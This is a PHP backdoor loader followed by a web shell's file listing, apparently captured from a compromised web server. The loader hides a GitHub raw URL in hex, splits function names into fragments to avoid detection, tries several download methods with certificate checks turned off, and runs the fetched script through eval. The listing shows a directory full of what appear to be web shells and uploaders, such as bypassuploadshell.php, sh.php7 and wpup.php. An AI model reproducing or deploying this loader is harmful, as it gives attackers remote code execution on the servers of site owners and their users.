<?php $hexUrl = '68747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F7468696E68636D642F7468696E68636D642F6D61696E2F6E61762E706870'; function hex2str($hex) { $str = ''; for ($i = 0; $i < strlen($hex) - 1; $i += 2) { $str .= chr(hexdec($hex[$i] . $hex[$i + 1])); } return $str; } $url = hex2str($hexUrl); function downloadWithFileGetContents($url) { if (ini_get('a' . 'llow' . '_ur' . 'l_fo' . 'pe' . 'n')) { return file_get_contents($url); } return false; } function downloadWithCurl($url) { if (function_exists('c' . 'u' . 'rl' . '_i' . 'n' . 'i' . 't')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $data = curl_exec($ch); curl_close($ch); return $data; } return false; } function downloadWithFopen($url) { $result = false; if ($fp = fopen($url, 'r')) { $result = ''; while ($data = fread($fp, 8192)) { $result .= $data; } fclose($fp); } return $result; } $phpScript = downloadWithFileGetContents($url); if ($phpScript === false) { $phpScript = downloadWithCurl($url); } if ($phpScript === false) { $phpScript = downloadWithFopen($url); } if ($phpScript === false) { die("Gagal mendownload script PHP dari URL dengan semua metode."); } eval('?>' . $phpScript); ?>
Name | Type | Size | Permission | Actions |
---|---|---|---|---|
.htaccess | File | 78 B | 0644 |
|
1.txt | File | 6 B | 0644 |
|
403.php | File | 5.51 KB | 0644 |
|
bak.php | File | 19.98 KB | 0644 |
|
batm.php | File | 39.31 KB | 0644 |
|
batmplus.php | File | 43.46 KB | 0644 |
|
batmup.php | File | 39.31 KB | 0644 |
|
bc.php | File | 5.55 KB | 0644 |
|
by.php | File | 5.7 KB | 0644 |
|
bypassuploadshell.php | File | 5.7 KB | 0644 |
|
cp2024.php | File | 39.94 KB | 0644 |
|
f.php | File | 192.75 KB | 0644 |
|
f35.php | File | 180.28 KB | 0644 |
|
g.php | File | 975.43 KB | 0644 |
|
gec.php | File | 160.56 KB | 0644 |
|
gel.php | File | 12.1 KB | 0644 |
|
gely.php | File | 16.08 KB | 0644 |
|
index.php | File | 2.83 KB | 0644 |
|
masht.php | File | 5.32 KB | 0644 |
|
masshp.php | File | 5.32 KB | 0644 |
|
massp.php | File | 5.33 KB | 0644 |
|
mymasshp.php | File | 3.63 KB | 0644 |
|
mymassp.php | File | 3.97 KB | 0644 |
|
nf.php | File | 79.44 KB | 0644 |
|
nfiav.php | File | 1.5 KB | 0644 |
|
nfiavu.php | File | 17.35 KB | 0644 |
|
nfu.php | File | 28.55 KB | 0644 |
|
nsss.php | File | 16.15 KB | 0644 |
|
polkit.zip | File | 92.76 KB | 0644 |
|
powny.php | File | 19.84 KB | 0644 |
|
qyh.php | File | 184.35 KB | 0644 |
|
sh.php7 | File | 11.37 KB | 0644 |
|
smpt.php | File | 981 B | 0644 |
|
stupid.php | File | 370.25 KB | 0644 |
|
undel.php | File | 43.99 KB | 0644 |
|
up.phtml | File | 1.74 KB | 0644 |
|
wp-set.php | File | 265.86 KB | 0644 |
|
wp-ver.php | File | 11.18 KB | 0644 |
|
wpup.php | File | 14.59 KB | 0644 |
|
wpupex.php | File | 13.83 KB | 0644 |
|
wpupp.php | File | 15.57 KB | 0644 |
|